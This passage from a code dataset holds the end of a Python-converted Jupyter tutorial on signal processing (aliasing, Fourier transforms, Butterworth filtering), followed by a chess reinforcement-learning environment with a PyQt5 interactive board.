Nyquist frequency of a signal. To observe the oscillations, we need to be sampling at least two times for each oscillation cycle. This will result in a jagged view of the data, but we can still theoretically observe the frequency. 
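As a quick arithmetic check (added here as a sketch; not part of the original lab), the cell below shows where an undersampled tone should land.\n\n# In[ ]:\n\n\n# Assumed example values: a 35 Hz tone sampled at 60 Hz\nfs = 60\nf_tone = 35\n# a tone between fs/2 and fs aliases down to fs - f\nprint(f'Nyquist frequency: {fs / 2} Hz')\nprint(f'A {f_tone} Hz tone sampled at {fs} Hz aliases to {fs - f_tone} Hz')\n\n\n# 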
Practically, higher sampling rates allow us to better observe the underlying signals.\n\n# In[24]:\n\n\nsampling_freq = 60\n\nfreq = [3, 10, 5, 15, 35]\namplitude = [5, 15, 10, 5, 7]\nphases = pi*np.array([1/7, 1/8, 1, 1/2, -1/4])\n\ntime = arange(-1, 1 + 1/sampling_freq, 1/sampling_freq) \n\nsine_waves = []\nfor i,f in enumerate(freq):\n    sine_waves.append(amplitude[i] * sin(2*pi*f*time + phases[i]))\nsine_waves = np.array(sine_waves)\n\n\nf,a = plt.subplots(nrows=5, ncols=1, figsize=(12,5), sharex=True)\nfor i,x in enumerate(freq):\n    a[i].plot(sine_waves[i,:], linewidth=2)\na[0].set_title(\"Sine waves oscillating at different frequencies\", fontsize=18)\na[i].set_xlabel(\"Time\", fontsize=18)\nplt.tight_layout() \n\n\nplt.figure(figsize=(12,3))\nplt.plot(np.sum(sine_waves, axis=0), linewidth=2)\nplt.title(\"Sum of all of the sine waves\", fontsize=18)\nplt.xlabel(\"Time\", fontsize=18)\nplt.tight_layout() \n\n\n# Notice the jagged lines for frequencies that are above the Nyquist frequency? That's because we don't have enough samples to accurately see the oscillations.\n# \n# \n# Ok, let's increase the sampling frequency to remove the aliasing. We can add a little bit of gaussian (white) noise on top of this signal to make it even more realistic. Try varying the amount of noise by adjusting the scaling on the noise. \n\n# In[25]:\n\n\nsampling_freq = 500\n\nfreq = [3, 10, 5, 15, 35]\namplitude = [5, 15, 10, 5, 7]\nphases = pi*np.array([1/7, 1/8, 1, 1/2, -1/4])\n\ntime = arange(-1, 1 + 1/sampling_freq, 1/sampling_freq) \n\nsine_waves = []\nfor i,f in enumerate(freq):\n    sine_waves.append(amplitude[i] * sin(2*pi*f*time + phases[i]))\nsine_waves = np.array(sine_waves)\n\n\nnoise = 5 * np.random.randn(sine_waves.shape[1])\nsignal = np.sum(sine_waves, axis=0) + noise\n\nplt.figure(figsize=(12,3))\nplt.plot(signal, linewidth=2)\nplt.title(\"Sum of sine waves plus white noise\", fontsize=18)\nplt.ylabel('Intensity', fontsize=18)\nplt.xlabel('Time', fontsize=18)\n\n\n# ## Time & Frequency Domains\n# We have seen above how to represent signals in the time domain. However, these signals can also be represented in the frequency domain.\n# \n# Let's get started by watching a short video by Mike X Cohen to get an overview of how a signal can be represented in both of these different domains.\n\n# In[19]:\n\n\nYouTubeVideo('fYtVHhk3xJ0')\n\n\n# ## Frequency Domain\n# \n# In the previous example, we generated a complex signal composed of multiple sine waves oscillating at different frequencies. Typically in data analysis, we only observe the signal and are trying to uncover the generative processes that gave rise to the signal. In this section, we will introduce the frequency domain and how we can identify whether any oscillations at a consistent frequency are present in our signal using the fourier transform. The fourier transform is essentially convolving different frequencies of sine waves with our data.\n# \n# One important assumption to note is that the fourier transform assumes that your oscillatory signals are stationary, which means that the generative processes giving rise to the oscillations do not vary over time. \n# \n# See this [video](https://youtu.be/rea6M1oagmA) for a more in depth discussion on stationarity. In practice, this assumption is rarely true. Often it can be useful to use other techniques such as wavelets to look at time x frequency representations. 
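A crude check on stationarity (added here as a sketch; not in the original lab) is to compare the spectrum of the first and second halves of the signal, which should look similar if the generative process is stable.\n\n# In[ ]:\n\n\nfrom numpy.fft import fft\n\nhalf = len(signal) // 2\n# amplitude spectra of each half, keeping only the positive frequencies\nspec_first = np.abs(fft(signal[:half]))[0:half // 2]\nspec_second = np.abs(fft(signal[half:2 * half]))[0:half // 2]\n\nplt.figure(figsize=(12, 3))\nplt.plot(spec_first, linewidth=2)\nplt.plot(spec_second, linewidth=2)\nplt.legend(['First half', 'Second half'], fontsize=14)\nplt.xlabel('Frequency (index)', fontsize=18)\nplt.ylabel('Amplitude', fontsize=18)\n\n\n# 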
We will not be covering wavelets here, but see this series of [videos](https://youtu.be/7ahrcB5HL0k) for more information.\n\n# ### Discrete Time Fourier Transform\n# We will gain an intuition of how the fourier transform works by building our own discrete time fourier transform. \n# \n# Let's watch this short video about the fourier transform by Mike X Cohen. Don't worry too much about the details of the discussion on the matlab code as we will be exploring these concepts in python below.\n\n# In[20]:\n\n\nYouTubeVideo('_htCsieA0_U')\n\n\n# The discrete Fourier transform of variable $x$ at frequency $f$ can be defined as:\n# \n# $X_f = \sum\limits_{k=0}^{n-1} x_k \cdot e^{\frac{-i2\pi fk}{n}}$\n# \n# where $n$ refers to the number of data points in vector $x$, and the capital letter $X_f$ is the fourier coefficient of time series variable $x$ at frequency $f$.\n# \n# Essentially, we create a bank of complex sine waves at different frequencies that are linearly spaced. The zero frequency component reflects the mean offset over the entire signal and will simply be zero in our example.\n\n# #### Complex Sine Waves\n# You may have noticed that we are computing *complex* sine waves using the `np.exp` function instead of the `np.sin` function. \n# \n# $$\text{complex sine wave} = e^{i(2\pi ft + \theta)}$$\n# \n# We will not spend too much time on the details, but basically complex sine waves have three components: time, a real part of the sine wave, and the imaginary part of the sine wave, which are basically phase shifted by $\frac{\pi}{2}$. \n# `1j` is how we can specify a complex number in python. We can extract the real components using `np.real` or the imaginary using `np.imag`. \n# \n# We can visualize complex sine waves in three dimensions. For more information, watch this [video](https://youtu.be/iZCDOuzfsY0). 
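As a quick numerical sanity check (added here; not from the original lab), the next cell verifies Euler's formula, which is what connects `np.exp` to the real and imaginary sine wave components.\n\n# In[ ]:\n\n\ntheta_grid = np.linspace(0, 2 * np.pi, 9)\n# exp(i*theta) should equal cos(theta) + i*sin(theta) at every point\nprint(np.allclose(np.exp(1j * theta_grid), np.cos(theta_grid) + 1j * np.sin(theta_grid)))\n\n\n# 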
If you need a refresher on complex numbers, you may want to watch this [video](https://youtu.be/fNfXKiIIufY).\n# \n# In this plot we show this complex signal in 3 dimensions and also project on two dimensional planes to show that the real and imaginary create a unit circle, and are phase offset by $\frac{\pi}{2}$ with respect to time.\n\n# In[26]:\n\n\nfrom mpl_toolkits import mplot3d\n\nfrequency = 5\nz = np.exp(1j*(2 * pi * frequency * time + theta))\n\nfig = plt.figure(figsize=(15, 10))\nax = fig.add_subplot(2, 2, 1, projection='3d')\nax.plot(np.arange(0, len(time))/sampling_freq, real(z), imag(z))\nax.set_xlabel('Time (sec)', fontsize=16)\nax.set_ylabel('Real(z)', fontsize=16)\nax.set_zlabel('Imaginary(z)', fontsize=16)\nax.set_title('Complex Sine Wave', fontsize=18)\nax.view_init(15, 250)\n\nax = fig.add_subplot(2, 2, 2)\nax.plot(real(z), imag(z))\nax.set_xlabel('Real(z)', fontsize=16)\nax.set_ylabel('Imaginary(z)', fontsize=16)\nax.set_title('Projecting on Real and Imaginary', fontsize=18)\n\nax = fig.add_subplot(2, 2, 3)\nax.plot(np.arange(0, len(time))/sampling_freq, real(z))\nax.set_xlabel('Time (sec)', fontsize=16)\nax.set_ylabel('Real(z)', fontsize=16)\nax.set_title('Projecting on Real and Time', fontsize=18)\n\nax = fig.add_subplot(2, 2, 4)\nax.plot(np.arange(0, len(time))/sampling_freq, imag(z))\nax.set_xlabel('Time (sec)', fontsize=16)\nax.set_ylabel('Imaginary(z)', fontsize=16)\nax.set_title('Projecting on Imaginary and Time', fontsize=18)\nplt.tight_layout()\n\n\n# #### Create a filter bank\n# Ok, now let's create a bank of $n$ linearly spaced complex sine waves (one per time point) and plot the first 5 waves to see their frequencies.\n# \n# Remember the first basis function is the zero frequency component and reflects the mean offset over the entire signal.\n\n# In[27]:\n\n\nimport numpy as np\nfrom numpy import exp\n\ntime = np.arange(0, len(signal), 1)/len(signal)\n\nsine_waves = []\nfor i in range(len(signal)):\n    sine_waves.append(exp(-1j*2*pi*i*time))\nsine_waves = np.array(sine_waves)\n\nf,a = plt.subplots(nrows=5, figsize=(12,8), sharex=True)\nfor i in range(0,5):\n    a[i].plot(sine_waves[i,:], linewidth=2)\na[0].set_title('Bank of sine waves', fontsize=18)\na[i].set_xlabel('Time', fontsize=18)\nplt.tight_layout()\n\n\n# We can visualize all of the sine waves simultaneously using a heatmap representation. Each row is a different sine wave, and columns reflect time. The color intensity encodes the wave's value, as if the sine wave were oscillating toward and away from you rather than up and down. Notice how the second half of the sine waves appears to be a mirror image of the first half. This is because the first half contains the *positive* frequencies, while the second half contains the *negative* frequencies. Negative frequencies capture sine waves that travel in reverse order around the complex plane compared to those that travel forward. This becomes more relevant with the Hilbert transform, but for the purposes of this tutorial we will be ignoring the negative frequencies.\n\n# In[28]:\n\n\nplt.figure(figsize = (12, 12))\nplt.imshow(np.real(sine_waves))\nplt.ylabel('Frequency', fontsize=18)\nplt.xlabel('Time', fontsize=18)\n\n\n# #### Estimate Fourier Coefficients\n# \n# Now let's take the dot product of each sine wave in the basis set with our signal to get the fourier coefficients. \n# \n# We can *scale* the coefficients to be more interpretable by dividing by the number of time points and multiplying by 2. 
Watch this [video](https://youtu.be/Ee9btm3tros) if you're interested in a more detailed explanation. Basically, this only needs to be done if you want the amplitude to be in the same units as the original data. In practice, this scaling factor will not change your interpretation of the spectrum.\n\n# In[29]:\n\n\nfourier = 2*np.dot(signal, sine_waves)/len(signal)\n\n\n# #### Visualizing Fourier Coefficients\n# \n# Now that we have computed the fourier transform, we might want to examine the results. The fourier transform provides a 3-D representation of the data including frequency, power, and phase. Typically, the phase information is ignored when plotting the results of a fourier analysis. The traditional way to view the information is to plot the data as amplitude on the *y-axis* and frequency on the *x-axis*. We will extract amplitude by taking the absolute value of the fourier coefficients. Remember that we are only focusing on the positive frequencies (the 1st half of the sine wave basis functions).\n# \n# Here the x axis simply reflects the index of the frequency. There are $N/2 + 1$ unique frequencies we can estimate, as we are only able to estimate frequencies up to half the sampling frequency; this is called the Nyquist frequency. Also, note that we are only plotting the first half of the frequencies. This is because we are only plotting the *positive* frequencies. We will ignore frequencies above the Nyquist frequency (i.e., $\frac{\text{fs}}{2}$), which are called negative frequencies. Watch this [video](https://youtu.be/Nupda1rm01Y) if you'd like more information about why. \n# \n# Watch this [video](https://youtu.be/oh7WvhlkxnU) to hear more about frequencies and zero padding.\n# \n\n# In[30]:\n\n\nplt.figure(figsize=(12, 5))\nplt.plot(np.abs(fourier[0:int(np.ceil(len(fourier)/2))]), linewidth=2)\nplt.xlabel('Frequency (index)', fontsize=18)\nplt.ylabel('Amplitude', fontsize=18)\nplt.title('Power spectrum derived from discrete fourier transform', fontsize=18)\n\n\n# Notice that there are 5 different frequencies that have varying amplitudes. Recall that when we simulated this data we added 5 different sine waves with different frequencies and amplitudes. \n# \n# `freq = [3, 10, 5, 15, 35]`\n# `amplitude = [5, 15, 10, 5, 7]`\n# \n# Let's zoom in a bit more to see this more clearly and also add the correct frequency labels in $Hz$. We will use the numpy `fftfreq` function to help convert frequency indices to $Hz$.\n\n# In[31]:\n\n\nfrom numpy.fft import fftfreq\n\nfreq = fftfreq(len(signal), 1/sampling_freq)\n\nplt.figure(figsize=(12,5))\nplt.plot(freq[:80], np.abs(fourier)[0:80], linewidth=2)\nplt.xlabel('Frequency (Hz)', fontsize=18)\nplt.ylabel('Amplitude', fontsize=18)\nplt.title('Power spectrum derived from discrete fourier transform', fontsize=18)\n\n\n# Ok, now that we've created our own discrete fourier transform, let's learn a few more details that are important to consider.\n\n# In[27]:\n\n\nYouTubeVideo('RHjqvcKVopg')\n\n\n# ### Inverse Fourier Transform\n# \n# The fourier transform allows you to represent a time series in the frequency domain. This is a lossless operation, meaning that no information in the original signal is lost by the transform. This means that we can reconstruct the original signal by inverting the operation. Thus, we can create a time series with only the frequency domain information using the *inverse fourier transform*. 
Watch this [video](https://youtu.be/HFacSL--vps) if you would like a more in depth explanation.\n# \n# $x_k = \sum\limits_{f=0}^{n-1} X_f \cdot e^{\frac{i2\pi fk}{n}}$\n# \n# Notice that we are computing the dot product between the complex sine wave and the fourier coefficients $X$ instead of the time series data $x$.\n\n# In[32]:\n\n\nplt.figure(figsize=(12,5))\n# use the conjugate so the exponent sign matches the inverse transform formula above\nplt.plot(np.real(np.dot(fourier, np.conj(sine_waves)) / 2))\nplt.ylabel('Intensity', fontsize=18)\nplt.xlabel('Time', fontsize=18)\nplt.title('Reconstructed Time Series Signal', fontsize=18)\n\n\n# ### Fast Fourier Transform\n# \n# The discrete time fourier transform is useful to understand the relationship between the time and frequency domains. However, in practice this method is rarely used as there are faster and more efficient methods to perform this computation. One popular algorithm is called the fast fourier transform (FFT). This function is available in numpy as `np.fft.fft`. Don't forget to divide by the number of samples to keep the scaling.\n\n# In[29]:\n\n\nfrom numpy.fft import fft, ifft, fftfreq\n\nfourier_fft = fft(signal)\n\nplt.figure(figsize=(12,5))\nplt.plot((np.arange(0,80)/2), 2*np.abs(fourier_fft[0:80])/len(signal), linewidth=2)\nplt.ylabel('Amplitude', fontsize=18)\nplt.xlabel('Frequency (Hz)', fontsize=18)\nplt.title('Frequency domain representation of signal derived from fast fourier transform', fontsize=18)\n\n\n# We can also use the `ifft` to perform an inverse fourier transform. \n\n# In[30]:\n\n\nplt.figure(figsize=(12, 5))\nplt.plot(np.real(ifft(fourier_fft)), linewidth=2)\nplt.ylabel('Intensity', fontsize=18)\nplt.xlabel('Time', fontsize=18)\nplt.title('Reconstructed Time Series Signal', fontsize=18)\n\n\n# ### Convolution Theorem\n# Convolution in the time domain is the same as multiplication in the frequency domain. This means that time domain convolution computations can be performed much more efficiently in the frequency domain via simple multiplication. (The opposite is also true: multiplication in the time domain is the same as convolution in the frequency domain.) Watch this [video](https://youtu.be/hj7j4Q8T3Ck) for an overview of the convolution theorem and convolution in the frequency domain.\n# \n# ![ConvolutionTheorem.png](../images/signal_processing/ConvolutionTheorem.png)\n\n# ## Filters\n# \n# Filters can be classified as finite impulse response (FIR) or infinite impulse response (IIR). These terms describe how a filter responds to a single input impulse. FIR filters have a response that ends at a discrete point in time, while IIR filters have a response that continues indefinitely.\n# \n# Filters are constructed in the frequency domain and have several properties that need to be considered.\n# \n# - ripple in the pass-band\n# - attenuation in the stop-band\n# - steepness of roll-off\n# - filter order (i.e., length for FIR filters)\n# - time-domain ringing\n# \n# In general, there is a frequency by time tradeoff. 
The sharper something is in frequency, the broader it is in time, and vice versa.\n# \n# Here we will use IIR Butterworth filters as an example.\n\n# ### High Pass\n# High pass filters only allow high frequency signals to remain, effectively *removing* any low frequency information.\n# \n# Here we will construct a high pass Butterworth filter and plot it in frequency space.\n# \n# **Note**: this example requires using scipy 1.2.1+.\n\n# In[31]:\n\n\nfrom scipy.signal import butter, filtfilt, freqz\n\nfilter_order = 3\nfrequency_cutoff = 25\nsampling_frequency = 500\n\n# Create the filter\nb, a = butter(filter_order, frequency_cutoff, btype='high', output='ba', fs=sampling_frequency)\n\ndef rad_sample_to_hz(x, fs):\n    return (x*fs)/(2*np.pi)\n\ndef plot_filter(b, a, fs):\n    plt.figure(figsize=(20,5))\n    w, h = freqz(b, a, worN=512*2, whole=False)\n    plt.plot(rad_sample_to_hz(w, fs), abs(h), linewidth=3)\n    plt.ylabel('Gain', fontsize=18)\n    plt.xlabel('Frequency', fontsize=18)\n    \nplot_filter(b, a, sampling_frequency)\n\n\n# Notice how the gain scales from [0,1]? Filters can be multiplied by the FFT of a signal to apply the filter in the frequency domain. When the resulting signal is transformed back to the time domain using the inverse FFT, the new signal will be filtered. This can be much faster than applying filters in the time domain.\n# \n# The filter_order parameter adjusts the sharpness of the cutoff in the frequency domain. Try playing with different values to see how it changes the filter plot.\n\n# In[32]:\n\n\nfilter_order = 2\nfrequency_cutoff = 25\nsampling_frequency = 500\n\n\nb, a = butter(filter_order, frequency_cutoff, btype='high', output='ba', fs=sampling_frequency) \n\nplot_filter(b, a, sampling_frequency)\n\n\n# What does the filter look like in the temporal domain? Let's take the inverse FFT and plot it to see what it looks like as a kernel in time. Notice how changing the filter order adds more ripples in the time domain.\n\n# In[33]:\n\n\nfrom scipy.signal import sosfreqz\n\nfilter_order = 8\nsos = butter(filter_order, frequency_cutoff, btype='high', output='sos', fs=sampling_frequency) \nw_sos, h_sos = sosfreqz(sos)\n\n# take the real part of the inverse FFT to avoid plotting a complex array\nplt.plot(np.real(ifft(h_sos))[0:100], linewidth=3)\nplt.ylabel('Amplitude', fontsize=18)\nplt.xlabel('Time', fontsize=18)\n\n\n# Now let's apply the filter to our data. We will be applying the filter to the signal in the time domain using the `filtfilt` function. This is a good default option, even though there are several other functions to apply the filter. 
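For instance, `scipy.signal.lfilter` runs a single forward (causal) pass that shifts the filtered signal in time; the cell below (added for comparison; not part of the original lab) contrasts the two approaches.\n\n# In[ ]:\n\n\nfrom scipy.signal import lfilter\n\ncausal = lfilter(b, a, signal)       # one forward pass: introduces a phase delay\nzero_phase = filtfilt(b, a, signal)  # forward-backward pass: no phase delay\n\nplt.figure(figsize=(20, 5))\nplt.plot(causal, linewidth=2)\nplt.plot(zero_phase, linewidth=2)\nplt.ylabel('Intensity', fontsize=18)\nplt.xlabel('Time', fontsize=18)\nplt.legend(['lfilter (causal)', 'filtfilt (zero-phase)'], fontsize=18)\n\n\n# 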
`filtfilt` applies the filter forward and then in reverse, ensuring zero phase distortion.\n\n# In[34]:\n\n\nfiltered = filtfilt(b, a, signal)\n\nplt.figure(figsize=(20,5))\nplt.plot(signal, linewidth=2)\nplt.plot(filtered, linewidth=2)\nplt.ylabel('Intensity', fontsize=18)\nplt.xlabel('Time', fontsize=18)\nplt.legend(['Original','Filtered'], fontsize=18)\n\n\n# ### Low Pass\n# Low pass filters only retain low frequency signals, which *removes* any high frequency information.\n\n# In[35]:\n\n\nfrom scipy.signal import butter, filtfilt\n\nfilter_order = 2\nfrequency_cutoff = 10\nsampling_frequency = 500\n\n# Create the filter\nb, a = butter(filter_order, frequency_cutoff, btype='low', output='ba', fs=sampling_frequency)\n\n# Apply the filter\nfiltered = filtfilt(b, a, signal)\n\nplt.figure(figsize=(20,5))\nplt.plot(signal, linewidth=2)\nplt.plot(filtered, linewidth=4)\nplt.ylabel('Intensity', fontsize=18)\nplt.xlabel('Time', fontsize=18)\nplt.legend(['Original','Filtered'], fontsize=18)\n\n\n# What does the filter look like?\n\n# In[36]:\n\n\nfilter_order = 10\nfrequency_cutoff = 10\nsampling_frequency = 500\n\n# Create the filter\nb, a = butter(filter_order, frequency_cutoff, btype='low', output='ba', fs=sampling_frequency)\n\nplot_filter(b, a, sampling_frequency)\n\n\n# ### Bandpass\n# \n# Bandpass filters retain only a specific band of frequencies. Morlet wavelets are an example of a bandpass filter; for example, a Morlet wavelet is a gaussian with its peak frequency at the center of the passband.\n# \n# Let's try selecting a specific band of frequencies.\n\n# In[37]:\n\n\nfilter_order = 2\nlowcut = 7\nhighcut = 13\n\n# Create the filter\nb, a = butter(filter_order, [lowcut, highcut], btype='bandpass', output='ba', fs=sampling_frequency)\n\n# Apply the filter\nfiltered = filtfilt(b, a, signal)\n\nplt.figure(figsize=(20,5))\nplt.plot(signal, linewidth=2)\nplt.plot(filtered, linewidth=4)\nplt.ylabel('Intensity', fontsize=18)\nplt.xlabel('Time', fontsize=18)\nplt.legend(['Original','Filtered'], fontsize=18)\n\n\n# ### Band-Stop\n# Bandstop filters remove a specific band of frequencies from the signal.\n\n# In[38]:\n\n\nfilter_order = 2\nlowcut = 8\nhighcut = 12\n\n# Create the filter\nb, a = butter(filter_order, [lowcut, highcut], btype='bandstop', output='ba', fs=sampling_frequency)\n\n# Plot the filter\nplot_filter(b, a, sampling_frequency)\n\n# Apply the filter\nfiltered = filtfilt(b, a, signal)\n\nplt.figure(figsize=(20,5))\nplt.plot(signal, linewidth=2)\nplt.plot(filtered, linewidth=2)\nplt.ylabel('Intensity', fontsize=18)\nplt.xlabel('Time', fontsize=18)\nplt.legend(['Original','Filtered'], fontsize=18)\n\n\n# ## Exercises\n# \n# ### Exercise 1. Create a simulated time series with 7 different frequencies with noise\n\n# In[ ]:\n\n\n\n\n\n# ### Exercise 2. Show that you can identify each signal using an FFT\n\n# In[ ]:\n\n\n\n\n\n# ### Exercise 3. Remove one frequency with a bandstop filter\n\n# In[ ]:\n\n\n\n\n\n# ### Exercise 4. 
Remove frequency with a bandstop filter in the frequency domain and reconstruct the signal in the time domain with the frequency removed and compare it to the original\n\n# In[ ]:\n\n\n\n\n","repo_name":"ljchang/dartbrains","sub_path":"_build/jupyter_execute/content/Signal_Processing.py","file_name":"Signal_Processing.py","file_ext":"py","file_size_in_byte":33260,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"78"} +{"seq_id":"8078063915","text":"from __future__ import print_function\nimport sys\nimport time\n\nsys.path.append('')\nfrom Game import Game\n\nimport numpy as np\nimport chess\nimport chess.svg\n\n\ndef to_np(board):\n a = [0] * (8 * 8 * 6)\n for sq, pc in board.piece_map().items():\n a[sq * 6 + pc.piece_type - 1] = 1 if pc.color else -1\n return np.array(a)\n\n\ndef from_move(move):\n return move.from_square * 64 + move.to_square\n\n\ndef to_move(action):\n to_sq = action % 64\n from_sq = int(action / 64)\n return chess.Move(from_sq, to_sq)\n\n\ndef who(turn):\n return 1 if turn else -1\n\n\ndef mirror_move(move):\n return chess.Move(chess.square_mirror(move.from_square), chess.square_mirror(move.to_square))\n\n\nCHECKMATE = 1\nSTALEMATE = 2\nINSUFFICIENT_MATERIAL = 3\nSEVENTYFIVE_MOVES = 4\nFIVEFOLD_REPETITION = 5\nFIFTY_MOVES = 6\nTHREEFOLD_REPETITION = 7\n\n\nclass ChessGame(Game):\n\n def __init__(self, n=8):\n pass\n\n def getInitBoard(self):\n # return initial board (numpy board)\n return chess.Board()\n\n def getBoardSize(self):\n # (a,b) tuple\n # 6 piece type\n return (8, 8, 6)\n\n def toArray(self, board):\n return to_np(board)\n\n def getActionSize(self):\n # return number of actions\n return 64 * 64\n # return self.n*self.n*16+1\n\n def getNextState(self, board, player, action):\n # if player takes action on board, return next (board,player)\n # action must be a valid move\n assert (who(board.turn) == player)\n move = to_move(action)\n\n if not board.turn:\n # assume the move comes from the canonical board...\n move = mirror_move(move)\n if move not in board.legal_moves:\n # could be a pawn promotion, which has an extra letter in UCI format\n move = chess.Move.from_uci(move.uci() + 'q') # assume promotion to queen\n if move not in board.legal_moves:\n assert False, \"%s not in %s\" % (str(move), str(list(board.legal_moves)))\n board = board.copy()\n board.push(move)\n return (board, who(board.turn))\n\n def getValidMoves(self, board, player):\n # return a fixed size binary vector\n assert (who(board.turn) == player)\n acts = [0] * self.getActionSize()\n for move in board.legal_moves:\n acts[from_move(move)] = 1\n return np.array(acts)\n\n def getGameEnded(self, board, player):\n # return 0 if not ended, 1 if player 1 won, -1 if player 1 lost\n outcome = board.outcome()\n if outcome is not None:\n if outcome.winner is None:\n # draw return very little value\n return 1e-4\n else:\n return who(outcome.winner)\n return 0\n\n def getCanonicalForm(self, board, player):\n # return state if player==1, else return -state if player==-1\n assert (who(board.turn) == player)\n if board.turn:\n return board\n else:\n return board.mirror()\n\n def getSymmetries(self, board, pi):\n # mirror, rotational\n return [(board, pi)]\n\n def stringRepresentation(self, board):\n return board.fen()\n\n @staticmethod\n def display(board):\n print(board)\n\n\n# import chess\n# import chess.svg\n#\n# from PyQt5.QtSvg import QSvgWidget\n# from PyQt5.QtWidgets import QApplication, QWidget\n#\n#\n# class MainWindow(QWidget):\n# def __init__(self, 
board=chess.Board()):\n# super().__init__()\n#\n# self.setGeometry(100, 100, 1000, 1000)\n#\n# self.widgetSvg = QSvgWidget(parent=self)\n# self.widgetSvg.setGeometry(10, 10, 980, 980)\n#\n# self.chessboard = board\n#\n# self.chessboardSvg = chess.svg.board(self.chessboard).encode(\"UTF-8\")\n# self.widgetSvg.load(self.chessboardSvg)\n#\n# def nextMove(self, event):\n# self.chessboard.push(event)\n# self.chessboardSvg = chess.svg.board(self.chessboard).encode(\"UTF-8\")\n# self.widgetSvg.load(self.chessboardSvg)\n# self.widgetSvg.update()\n\n# def paintEvent(self, event):\n# self.chessboard.push(event)\n# self.chessboardSvg = chess.svg.board(self.chessboard).encode(\"UTF-8\")\n# self.widgetSvg.load(self.chessboardSvg)\n\n\nimport chess\nimport chess.svg\nfrom PyQt5.QtCore import pyqtSignal, pyqtSlot, Qt\nfrom PyQt5.QtSvg import QSvgWidget\nfrom PyQt5.QtWidgets import QDialog, QWidget, QRadioButton, QPushButton, QButtonGroup, QGroupBox, QHBoxLayout, \\\n QVBoxLayout\nimport sys\n\n\nclass ChessBoard(QWidget, chess.Board):\n \"\"\"\n BRIEF An interactive chessboard that only allows legal moves\n \"\"\"\n\n ReadyForNextMove = pyqtSignal(str)\n GameOver = pyqtSignal()\n\n def __init__(self, parent=None):\n \"\"\"\n BRIEF Initialize the chessboard\n \"\"\"\n super().__init__(parent)\n self.setWindowTitle(\"Chess\")\n\n self.svg_xy = 50 # top left x,y-pos of chessboard\n self.board_size = 600 # size of chessboard\n self.margin = 0.05 * self.board_size\n self.square_size = (self.board_size - 2 * self.margin) / 8.0\n wnd_wh = self.board_size + 2 * self.svg_xy\n\n self.setMinimumSize(wnd_wh, wnd_wh)\n self.svg_widget = QSvgWidget(parent=self)\n self.svg_widget.setGeometry(self.svg_xy, self.svg_xy, self.board_size, self.board_size)\n\n self.last_click = None\n self.DrawBoard()\n\n @pyqtSlot(QWidget)\n def mousePressEvent(self, event):\n \"\"\"\n BRIEF Update the board state based on user clicks\n If the state changes, update the svg widget\n \"\"\"\n if self.LeftClickedBoard(event):\n this_click = self.GetClicked(event)\n\n if self.last_click:\n if self.last_click != this_click:\n uci = self.last_click + this_click\n self.ApplyMove(uci + self.GetPromotion(uci))\n self.last_click = this_click\n\n def GetPromotion(self, uci):\n \"\"\"\n BRIEF Get the uci piece type the pawn will be promoted to\n \"\"\"\n if chess.Move.from_uci(uci + 'q') in self.legal_moves:\n dialog = PromotionDialog(self)\n if dialog.exec() == QDialog.Accepted:\n return dialog.SelectedPiece()\n return ''\n\n @pyqtSlot(str)\n def ApplyMove(self, uci):\n \"\"\"\n BRIEF Apply a move to the board\n \"\"\"\n move = chess.Move.from_uci(uci)\n if move in self.legal_moves:\n self.push(move)\n self.DrawBoard()\n\n print(self.fen())\n if not self.is_game_over():\n self.ReadyForNextMove.emit(self.fen())\n else:\n print(\"Game over!\")\n self.GameOver.emit()\n sys.stdout.flush()\n\n\n def DrawBoard(self):\n \"\"\"\n BRIEF Redraw the chessboard based on board state\n Highlight src and dest squares for last move\n Highlight king if in check\n \"\"\"\n self.svg_widget.load(self._repr_svg_().encode(\"utf-8\"))\n\n def GetClicked(self, event):\n \"\"\"\n BRIEF Get the algebraic notation for the clicked square\n \"\"\"\n top_left = self.svg_xy + self.margin\n file_i = int((event.x() - top_left) / self.square_size)\n rank_i = 7 - int((event.y() - top_left) / self.square_size)\n return chr(file_i + 97) + str(rank_i + 1)\n\n def LeftClickedBoard(self, event):\n \"\"\"\n BRIEF Check to see if they left-clicked on the chess board\n \"\"\"\n topleft = 
self.svg_xy + self.margin\n        bottomright = self.board_size + self.svg_xy - self.margin\n        return all([\n            event.buttons() == Qt.LeftButton,\n            topleft < event.x() < bottomright,\n            topleft < event.y() < bottomright,\n        ])\n\n\nclass PromotionDialog(QDialog):\n    \"\"\"\n    BRIEF  A dialog used to decide what to promote a pawn to\n    \"\"\"\n\n    def __init__(self, parent=None):\n        \"\"\"\n        BRIEF  Initialize the dialog with buttons\n        \"\"\"\n        super().__init__(parent, Qt.WindowSystemMenuHint | Qt.WindowTitleHint)\n        self.setWindowTitle(\"Promotion\")\n\n        radio_q = QRadioButton(\"q\")\n        radio_r = QRadioButton(\"r\")\n        radio_b = QRadioButton(\"b\")\n        radio_n = QRadioButton(\"n\")\n\n        self.button_group = QButtonGroup()\n        self.button_group.addButton(radio_q)\n        self.button_group.addButton(radio_r)\n        self.button_group.addButton(radio_b)\n        self.button_group.addButton(radio_n)\n\n        radio_q.setChecked(True)\n\n        radio_h_layout = QHBoxLayout()\n        radio_h_layout.addWidget(radio_q)\n        radio_h_layout.addWidget(radio_r)\n        radio_h_layout.addWidget(radio_b)\n        radio_h_layout.addWidget(radio_n)\n\n        group_box = QGroupBox()\n        group_box.setLayout(radio_h_layout)\n\n        ok_button = QPushButton(\"Ok\")\n        cancel_button = QPushButton(\"Cancel\")\n\n        ok_button.released.connect(self.accept)\n        cancel_button.released.connect(self.reject)\n\n        button_h_layout = QHBoxLayout()\n        button_h_layout.addWidget(ok_button)\n        button_h_layout.addWidget(cancel_button)\n\n        v_layout = QVBoxLayout()\n        v_layout.addWidget(group_box)\n        v_layout.addLayout(button_h_layout)\n        self.setLayout(v_layout)\n\n    def SelectedPiece(self):\n        \"\"\"\n        BRIEF  Get the uci piece type the user selected from the dialog\n        \"\"\"\n        return self.button_group.checkedButton().text()\n\n\n\nif __name__ == \"__main__\":\n    \"\"\"\n    BRIEF  Test the ChessBoard class\n    \"\"\"\n    from PyQt5.QtWidgets import QApplication\n\n    q_app = QApplication([])\n    board = ChessBoard()\n    board.show()\n\n\n    q_app.exec()\n","repo_name":"Juravlik/chess_rl_ai","sub_path":"_chess/ChessGame.py","file_name":"ChessGame.py","file_ext":"py","file_size_in_byte":9731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
